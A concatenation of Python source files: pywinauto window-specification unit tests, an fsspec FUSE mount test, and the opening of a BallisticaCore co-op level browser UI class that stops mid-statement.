"""Test that we can get a control"""
self.assertEqual(True, isinstance(self.dlgspec, WindowSpecification))
self.assertEqual(
True,
isinstance(self.dlgspec.find(), hwndwrapper.HwndWrapper)
)
def test_window(self):
"""test specifying a sub window of an existing specification"""
sub_spec = self.dlgspec.by(class_name ="Edit")
sub_spec_legacy = self.dlgspec.window(class_name = "Edit")
self.assertEqual(True, isinstance(sub_spec, WindowSpecification))
self.assertEqual(sub_spec.class_name(), "Edit")
self.assertEqual(sub_spec_legacy.class_name(), "Edit")
def test__getitem__(self):
"""test item access of a windowspec"""
self.assertEqual(
True,
isinstance(self.dlgspec['Edit'], WindowSpecification)
)
self.assertEqual(self.dlgspec['Edit'].class_name(), "Edit")
self.assertRaises(AttributeError, self.ctrlspec.__getitem__, 'edit')
def test_getattr(self):
"""Test getting attributes works correctly"""
self.assertEqual(
True,
isinstance(self.dlgspec.Edit, WindowSpecification)
)
self.assertEqual(self.dlgspec.Edit.class_name(), "Edit")
# check that getting a dialog attribute works correctly
self.assertEqual(
"Notepad",
self.dlgspec.class_name())
# Check handling 'parent' as a WindowSpecification
spec = self.ctrlspec.by(parent=self.dlgspec, visible=True)
self.assertEqual(spec.class_name(), "Edit")
def test_non_magic_getattr(self):
ws = WindowSpecification(dict(best_match="Notepad"))
self.assertEqual(ws.allow_magic_lookup, True)
ws_no_magic = WindowSpecification(dict(best_match="Notepad"), allow_magic_lookup=False)
self.assertEqual(ws_no_magic.allow_magic_lookup, False)
dlg = ws_no_magic.by(best_match="Edit")
has_focus = dlg.has_keyboard_focus()
self.assertIn(has_focus, (True, False))
with self.assertRaises(AttributeError):
ws_no_magic.Edit
def test_exists(self):
"""Check that windows exist"""
self.assertEqual(True, self.dlgspec.exists())
self.assertEqual(True, self.dlgspec.exists(0))
self.assertEqual(True, self.ctrlspec.exists())
# TODO: test a control that is not visible but exists
#self.assertEqual(True, self.app.DefaultIME.exists())
start = timestamp()
self.assertEqual(False, self.app.BlahBlah.exists(timeout=.1))
self.assertEqual(True, timestamp() - start < .3)
start = timestamp()
self.assertEqual(False, self.app.BlahBlah.exists(timeout=3))
self.assertEqual(True, 2.7 < timestamp() - start < 3.3)
def test_exists_timing(self):
"""test the timing of the exists method"""
# try ones that should be found immediately
start = timestamp()
self.assertEqual(True, self.dlgspec.exists())
self.assertEqual(True, timestamp() - start < .3)
start = timestamp()
self.assertEqual(True, self.ctrlspec.exists())
self.assertEqual(True, timestamp() - start < .3)
# try one that should not be found
start = timestamp()
self.assertEqual(True, self.dlgspec.exists(.5))
timedif = timestamp() - start
self.assertEqual(True, .49 > timedif < .6)
def test_wait(self):
"""test the functionality and timing of the wait method"""
allowable_error = .2
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("enaBleD "))
time_taken = (timestamp() - start)
if not 0 <= time_taken < (0 + 2 * allowable_error):
self.assertEqual(.02, time_taken)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" ready"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" exiSTS"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" VISIBLE "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait(" ready enabled"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("visible exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.find(), self.dlgspec.wait("actIve "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.wait, "Invalid_criteria")
def test_wait_non_existing(self):
"""test timing of the wait method for non-existing element"""
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'exists')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_invisible(self):
"""test timing of the wait method for non-existing element and existing invisible one"""
# TODO: re-use an MFC sample for this test
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'visible')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
# make sure Status Bar is not visible
status_bar_menu = self.app.UntitledNotepad.menu().item('&View').sub_menu().item('&Status Bar')
if status_bar_menu.is_checked():
status_bar_menu.select()
# check that existing invisible control is still found with 'exists' criterion
status_bar_spec = self.app.UntitledNotepad.by(class_name="msctls_statusbar32", visible=None)
self.assertEqual('StatusBar', status_bar_spec.wait('exists').friendly_class_name())
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'exists visible')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'visible exists')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_not(self):
"""
Test that wait not fails for all the following
* raises and error when criteria not met
* timing is close to the timeout value
"""
allowable_error = .16
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "enaBleD ", .1, .05)
taken = timestamp() - start
if .1 < (taken) > .1 + allowable_error:
self.assertEqual(.12, taken)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " ready", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " exiSTS", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " VISIBLE ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, " ready enabled", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "visible exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.wait_not, "actIve ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.wait_not, "Invalid_criteria")
# def test_wait_ready(self):
# """Make sure the friendly class is set correctly"""
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitReady(.1, .05))
#
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotReady(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotReady, .1, .05)
#
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
#
# def testWaitEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitEnabled(.1, .05))
#
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
#
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotEnabled, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
# def testWaitVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitVisible(.1, .05))
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
# def testWaitNotVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotVisible, .1, .05)
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitExists(.1, .05))
#
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitNotExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotExists, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
def test_depth(self):
"""Test that descendants() with depth works correctly"""
self.dlgspec.menu_select("Format -> Font")
self.assertNotEqual(
len(self.app['Font'].descendants(depth=1)),
len(self.app['Font'].descendants(depth=2)))
def test_dump_tree(self):
"""Make sure dump_tree() doesn't crash"""
self.dlgspec.dump_tree()
self.ctrlspec.dump_tree()
def test_dump_tree_file_output(self):
"""Make sure dump_tree() creates correct file"""
output_filename = "test_dump_tree.txt"
self.dlgspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("'Untitled - NotepadEdit'" in content
and "'Edit'" in content)
self.assertTrue(".by(class_name='msctls_statusbar32'" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue(".by(class_name='Edit')" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
def test_find_elements_re(self):
"""Test for bug #90: A crash in 'find_elements' when called with 'title_re' argument"""
self.dlgspec.wait('visible')
windows = findwindows.find_elements(name_re="Untitled - Notepad")
self.assertTrue(len(windows) >= 1)
class ChildWindowSpecificationFromWrapperTests(unittest.TestCase):
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="win32").start(_notepad_exe())
self.ctrlspec = self.app.window(found_index=0).find().by(class_name='Edit')
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_wrapper_object(self):
"""Test that we can get a control"""
self.assertEqual(True, isinstance(self.ctrlspec, WindowSpecification))
self.assertEqual(
True,
isinstance(self.ctrlspec.find(), hwndwrapper.HwndWrapper)
)
def test_parent(self):
"""Test recreating specification from parent dialog wrapper"""
dlg = self.ctrlspec.parent()
sub_spec = dlg.by(class_name ="Edit")
self.assertEqual(True, isinstance(sub_spec, WindowSpecification))
self.assertEqual(sub_spec.class_name(), "Edit")
self.assertEqual(self.ctrlspec.handle, sub_spec.handle)
def test_dump_tree_file_output(self):
"""Make sure dump_tree() creates correct file"""
output_filename = "test_dump_tree.txt"
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue(".by(class_name='Edit')" in content)
os.remove(output_filename)
else:
self.fail("dump_tree can't create a file")
def test_properties(self):
"""Check control properties"""
self.assertEqual(self.ctrlspec.class_name(), "Edit")
self.assertTrue(self.ctrlspec.exists())
if UIA_support:
class UIAWindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class with UIA backend"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend="uia").start(_notepad_exe())
self.dlgspec = self.app.UntitledNotepad
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_child_window_depth(self):
"""Test that child_window() with depth works correctly"""
# TODO fix same elements at different tree levels on win32 backend
self.dlgspec.menu_select("Format -> Font")
font = self.dlgspec.by(name="Font")
with self.assertRaises(findbestmatch.MatchError):
font.by(best_match="ListBox0", depth=1).find()
font.by(best_match="ListBox0", depth=2).find()
class WaitUntilDecoratorTests(unittest.TestCase):
"""Unit tests for always_wait_until and always_wait_until_passes decorators"""
def test_always_wait_until_decorator_success(self):
"""Test always_wait_until_decorator success"""
@always_wait_until(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_decorator_failure(self):
"""Test wait_until_decorator failure"""
@always_wait_until(4, 2)
def foo():
return False
self.assertRaises(TimeoutError, foo)
def test_always_wait_until_passes_decorator_success(self):
"""Test always_wait_until_passes_decorator success"""
@always_wait_until_passes(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_passes_decorator_failure(self):
"""Test always_wait_until_passes_decorator failure"""
@always_wait_until_passes(4, 2)
def foo():
raise Exception("Unexpected Error in foo")
self.assertRaises(TimeoutError, foo)
class MultiLevelWindowSpecificationTests(unittest.TestCase):
"""Unit tests for multi-level (3+) WindowSpecification objects"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application(backend='uia').start(os.path.join(mfc_samples_folder, u"RowList.exe"))
self.dlg = self.app.RowListSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.dlg.CloseButton.click()
self.dlg.wait_not('visible')
def test_3level_specification(self):
"""Test that controls can be accessed by 3 levels of attributes"""
self.dlg.Toolbar.About.click()
self.dlg.AboutRowList.OK.click()
#self.dlg.AboutRowList.wait_not('visible') # XXX: it takes more than 50 seconds!
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.dlg = self.app.CommonControlsSample
def tearDown(self):
"""Close the application after tests"""
self.dlg.SendMessage(win32defines.WM_CLOSE)
def test_4level_specification(self):
"""Test that controls can be accessed by 4 levels of attributes"""
self.assertEqual(self.dlg.CPagerCtrl.Pager.Toolbar.button_count(), 12)
if UIA_support:
class DesktopUiaWindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop(backend='uia') object"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application().start('explorer.exe "' + mfc_samples_folder_32 + '"')
self.desktop = Desktop(backend='uia')
self.desktop_no_magic = Desktop(backend='uia', allow_magic_lookup=False)
def tearDown(self):
"""Close the application after tests"""
self.desktop.MFC_samplesDialog.close()
self.desktop.MFC_samplesDialog.wait_not('exists')
def test_folder_list(self):
"""Test that ListViewWrapper returns correct files list in explorer.exe"""
files_list = self.desktop.MFC_samplesDialog.Shell_Folder_View.Items_View.find()
self.assertEqual([item.window_text() for item in files_list.get_items()],
[u'x64', u'BCDialogMenu.exe', u'CmnCtrl1.exe', u'CmnCtrl2.exe', u'CmnCtrl3.exe',
u'CtrlTest.exe', u'mfc100u.dll', u'NewControls.exe', u'RebarTest.exe', u'RowList.exe', u'TrayMenu.exe'])
self.assertEqual(files_list.item('RebarTest.exe').window_text(), 'RebarTest.exe')
def test_set_backend_to_window_uia(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', name='MFC_samplesDialog')
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', name='MFC_samplesDialog')
def test_get_list_of_windows_uia(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
def test_set_backend_to_windows_uia(self):
"""Set backend to method .windows(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_uia(self):
"""Set visible=True to method .windows()"""
dlgs = self.desktop.windows(visible=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_uia(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
def test_non_magic_desktop(self):
from pywinauto.controls.uiawrapper import UIAWrapper
self.assertEqual(self.desktop.allow_magic_lookup, True)
self.assertEqual(self.desktop_no_magic.allow_magic_lookup, False)
dlgs = self.desktop_no_magic.windows()
self.assertTrue(len(dlgs) > 1)
window = self.desktop_no_magic.window(name="MFC_samples")
self.assertEqual(window.allow_magic_lookup, False)
dlg = window.by(class_name="ShellTabWindowClass").find()
self.assertIsInstance(dlg, UIAWrapper)
has_focus = dlg.has_keyboard_focus()
self.assertIn(has_focus, (True, False))
with self.assertRaises(AttributeError):
self.desktop_no_magic.MFC_samples
with self.assertRaises(AttributeError):
window.ShellTabWindowClass
class DesktopWin32WindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop(backend='win32') object"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.desktop = Desktop(backend='win32')
self.desktop_no_magic = Desktop(backend='win32', allow_magic_lookup=False)
self.window_title = 'Common Controls Sample'
def tearDown(self):
"""Close the application after tests"""
self.desktop.window(name=self.window_title, pid=self.app.process).SendMessage(win32defines.WM_CLOSE)
def test_simple_access_through_desktop(self):
"""Test that controls can be accessed by 4 levels of attributes"""
dlg = self.desktop.window(name=self.window_title, pid=self.app.process)
self.assertEqual(dlg.Pager.Toolbar.button_count(), 12)
def test_set_backend_to_window_win32(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', name=self.window_title, pid=self.app.process)
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', name=self.window_title, pid=self.app.process)
def test_get_list_of_windows_win32(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
window_titles = [win_obj.window_text() for win_obj in dlgs]
self.assertTrue(self.window_title in window_titles)
def test_set_backend_to_windows_win32(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_win32(self):
"""Set visible=True to method .windows()"""
dlgs = self.desktop.windows(visible=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_win32(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
def test_from_point_win32(self):
"""Test method Desktop(backend='win32').from_point(x, y)"""
combo = self.app.Common_Controls_Sample.ComboBox.find()
x, y = combo.rectangle().mid_point()
combo_from_point = self.desktop.from_point(x, y)
self.assertEqual(combo, combo_from_point)
def test_top_from_point_win32(self):
"""Test method Desktop(backend='win32').top_from_point(x, y)"""
combo = self.app.Common_Controls_Sample.ComboBox.find()
dlg = self.app.Common_Controls_Sample.find()
x, y = combo.rectangle().mid_point()
dlg_from_point = self.desktop.top_from_point(x, y)
self.assertEqual(dlg, dlg_from_point)
def test_non_magic_desktop(self):
self.assertEqual(self.desktop.allow_magic_lookup, True)
self.assertEqual(self.desktop_no_magic.allow_magic_lookup, False)
window = self.desktop_no_magic.window(name=self.window_title, pid=self.app.process)
self.assertEqual(window.allow_magic_lookup, False)
dlg = window.by(class_name="msctls_trackbar32").find()
self.assertIsInstance(dlg, TrackbarWrapper)
pos = dlg.get_position()
self.assertIsInstance(pos, six.integer_types)
with self.assertRaises(AttributeError):
getattr(self.desktop_no_magic, self.window_title.replace(" ", "_"))
with self.assertRaises(AttributeError):
window.msctls_trackbar32
if __name__ == "__main__":
unittest.main()
|
test_fuse.py | import os
import signal
import time
from multiprocessing import Process
import pytest
try:
pytest.importorskip("fuse") # noqa: E402
except OSError:
# can succeed in importing fuse, but fail to load so
pytest.importorskip("nonexistent") # noqa: E402
from fsspec.fuse import run
from fsspec.implementations.memory import MemoryFileSystem
def host_fuse(mountdir):
fs = MemoryFileSystem()
fs.touch("/mounted/testfile")
run(fs, "/mounted/", mountdir)
def test_basic(tmpdir, capfd):
mountdir = str(tmpdir.mkdir("mount"))
fuse_process = Process(target=host_fuse, args=(str(mountdir),))
fuse_process.start()
try:
timeout = 10
while True:
try:
# can fail with device not ready while waiting for fuse
if "testfile" in os.listdir(mountdir):
break
except Exception:
pass
timeout -= 1
time.sleep(1)
if not timeout > 0:
import pdb
pdb.set_trace()
pytest.skip(msg="fuse didn't come live")
fn = os.path.join(mountdir, "test")
with open(fn, "wb") as f:
f.write(b"data")
with open(fn) as f:
assert f.read() == "data"
os.remove(fn)
os.mkdir(fn)
assert os.listdir(fn) == []
os.mkdir(fn + "/inner")
with pytest.raises(OSError):
os.rmdir(fn)
captured = capfd.readouterr()
assert "Traceback" not in captured.out
assert "Traceback" not in captured.err
os.rmdir(fn + "/inner")
os.rmdir(fn)
finally:
os.kill(fuse_process.pid, signal.SIGTERM)
fuse_process.join()
|
browser.py | # Released under the MIT License. See LICENSE for details.
#
"""UI for browsing available co-op levels/games/etc."""
# FIXME: Break this up.
# pylint: disable=too-many-lines
from __future__ import annotations
import copy
from typing import TYPE_CHECKING
import _ba
import ba
from bastd.ui.store.button import StoreButton
from bastd.ui.league.rankbutton import LeagueRankButton
from bastd.ui.store.browser import StoreBrowserWindow
if TYPE_CHECKING:
from typing import Any, Optional, Union
class CoopBrowserWindow(ba.Window):
"""Window for browsing co-op levels/games/etc."""
def _update_corner_button_positions(self) -> None:
uiscale = ba.app.ui.uiscale
offs = (-55 if uiscale is ba.UIScale.SMALL
and _ba.is_party_icon_visible() else 0)
if self._league_rank_button is not None:
self._league_rank_button.set_position(
(self._width - 282 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
if self._store_button is not None:
self._store_button.set_position(
(self._width - 170 + offs - self._x_inset, self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)))
def __init__(self,
transition: Optional[str] = 'in_right',
origin_widget: ba.Widget = None):
# pylint: disable=too-many-statements
# pylint: disable=cyclic-import
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
ba.set_analytics_screen('Coop Window')
app = ba.app
cfg = app.config
# Quick note to players that tourneys won't work in ballistica
# core builds. (need to split the word so it won't get subbed out)
if 'ballistica' + 'core' == _ba.appname():
ba.timer(1.0,
lambda: ba.screenmessage(
ba.Lstr(resource='noTournamentsInTestBuildText'),
color=(1, 1, 0),
),
timetype=ba.TimeType.REAL)
# If they provided an origin-widget, scale up from that.
scale_origin: Optional[tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
# Try to recreate the same number of buttons we had last time so our
# re-selection code works.
self._tournament_button_count = app.config.get('Tournament Rows', 0)
assert isinstance(self._tournament_button_count, int)
self._easy_button: Optional[ba.Widget] = None
self._hard_button: Optional[ba.Widget] = None
self._hard_button_lock_image: Optional[ba.Widget] = None
self._campaign_percent_text: Optional[ba.Widget] = None
uiscale = ba.app.ui.uiscale
self._width = 1320 if uiscale is ba.UIScale.SMALL else 1120
self._x_inset = x_inset = 100 if uiscale is ba.UIScale.SMALL else 0
self._height = (657 if uiscale is ba.UIScale.SMALL else
730 if uiscale is ba.UIScale.MEDIUM else 800)
app.ui.set_main_menu_location('Coop Select')
self._r = 'coopSelectWindow'
top_extra = 20 if uiscale is ba.UIScale.SMALL else 0
self._tourney_data_up_to_date = False
self._campaign_difficulty = _ba.get_account_misc_val(
'campaignDifficulty', 'easy')
super().__init__(root_widget=ba.containerwidget(
size=(self._width, self._height + top_extra),
toolbar_visibility='menu_full',
scale_origin_stack_offset=scale_origin,
stack_offset=((0, -15) if uiscale is ba.UIScale.SMALL else (
0, 0) if uiscale is ba.UIScale.MEDIUM else (0, 0)),
transition=transition,
scale=(1.2 if uiscale is ba.UIScale.SMALL else
0.8 if uiscale is ba.UIScale.MEDIUM else 0.75)))
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
self._back_button = None
else:
self._back_button = ba.buttonwidget(
parent=self._root_widget,
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(120, 60),
scale=1.2,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back')
self._league_rank_button: Optional[LeagueRankButton]
self._store_button: Optional[StoreButton]
self._store_button_widget: Optional[ba.Widget]
self._league_rank_button_widget: Optional[ba.Widget]
if not app.ui.use_toolbars:
prb = self._league_rank_button = LeagueRankButton(
parent=self._root_widget,
position=(self._width - (282 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.4, 0.4, 0.9),
textcolor=(0.9, 0.9, 2.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_league_rankings))
self._league_rank_button_widget = prb.get_button()
sbtn = self._store_button = StoreButton(
parent=self._root_widget,
position=(self._width - (170 + x_inset), self._height - 85 -
(4 if uiscale is ba.UIScale.SMALL else 0)),
size=(100, 60),
color=(0.6, 0.4, 0.7),
show_tickets=True,
button_type='square',
sale_scale=0.85,
textcolor=(0.9, 0.7, 1.0),
scale=1.05,
on_activate_call=ba.WeakCall(self._switch_to_score, None))
self._store_button_widget = sbtn.get_button()
ba.widget(edit=self._back_button,
right_widget=self._league_rank_button_widget)
ba.widget(edit=self._league_rank_button_widget,
left_widget=self._back_button)
else:
self._league_rank_button = None
self._store_button = None
self._store_button_widget = None
self._league_rank_button_widget = None
# Move our corner buttons dynamically to keep them out of the way of
# the party icon :-(
self._update_corner_button_positions()
self._update_corner_button_positions_timer = ba.Timer(
1.0,
ba.WeakCall(self._update_corner_button_positions),
repeat=True,
timetype=ba.TimeType.REAL)
self._last_tournament_query_time: Optional[float] = None
self._last_tournament_query_response_time: Optional[float] = None
self._doing_tournament_query = False
self._selected_campaign_level = (cfg.get(
'Selected Coop Campaign Level', None))
self._selected_custom_level = (cfg.get('Selected Coop Custom Level',
None))
self._selected_challenge_level = (cfg.get(
'Selected Coop Challenge Level', None))
# Don't want initial construction affecting our last-selected.
self._do_selection_callbacks = False
v = self._height - 95
txt = ba.textwidget(
parent=self._root_widget,
position=(self._width * 0.5,
v + 40 - (0 if uiscale is ba.UIScale.SMALL else 0)),
size=(0, 0),
text=ba.Lstr(resource='playModes.singlePlayerCoopText',
fallback_resource='playModes.coopText'),
h_align='center',
color=app.ui.title_color,
scale=1.5,
maxwidth=500,
v_align='center')
if app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.textwidget(edit=txt, text='')
if self._back_button is not None:
ba.buttonwidget(
edit=self._back_button,
button_type='backSmall',
size=(60, 50),
position=(75 + x_inset, self._height - 87 -
(4 if uiscale is ba.UIScale.SMALL else 0) + 6),
label=ba.charstr(ba.SpecialChar.BACK))
self._selected_row = cfg.get('Selected Coop Row', None)
self.star_tex = ba.gettexture('star')
self.lsbt = ba.getmodel('level_select_button_transparent')
self.lsbo = ba.getmodel('level_select_button_opaque')
self.a_outline_tex = ba.gettexture('achievementOutline')
self.a_outline_model = ba.getmodel('achievementOutline')
self._scroll_width = self._width - (130 + 2 * x_inset)
self._scroll_height = (self._height -
(190 if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else 160))
self._subcontainerwidth = 800.0
self._subcontainerheight = 1400.0
self._scrollwidget = ba.scrollwidget(
parent=self._root_widget,
highlight=False,
position=(65 + x_inset, 120) if uiscale is ba.UIScale.SMALL
and app.ui.use_toolbars else (65 + x_inset, 70),
size=(self._scroll_width, self._scroll_height),
simple_culling_v=10.0,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
self._subcontainer: Optional[ba.Widget] = None
# Take note of our account state; we'll refresh later if this changes.
self._account_state_num = _ba.get_account_state_num()
# Same for fg/bg state.
self._fg_state = app.fg_state
self._refresh()
self._restore_state()
# Even though we might display cached tournament data immediately, we
# don't consider it valid until we've pinged.
# the server for an update
self._tourney_data_up_to_date = False
# If we've got a cached tournament list for our account and info for
# each one of those tournaments, go ahead and display it as a
# starting point.
if (app.accounts.account_tournament_list is not None
and app.accounts.account_tournament_list[0]
== _ba.get_account_state_num()
and all(t_id in app.accounts.tournament_info
for t_id in app.accounts.account_tournament_list[1])):
tourney_data = [
app.accounts.tournament_info[t_id]
for t_id in app.accounts.account_tournament_list[1]
]
self._update_for_data(tourney_data)
# This will pull new data periodically, update timers, etc.
self._update_timer = ba.Timer(1.0,
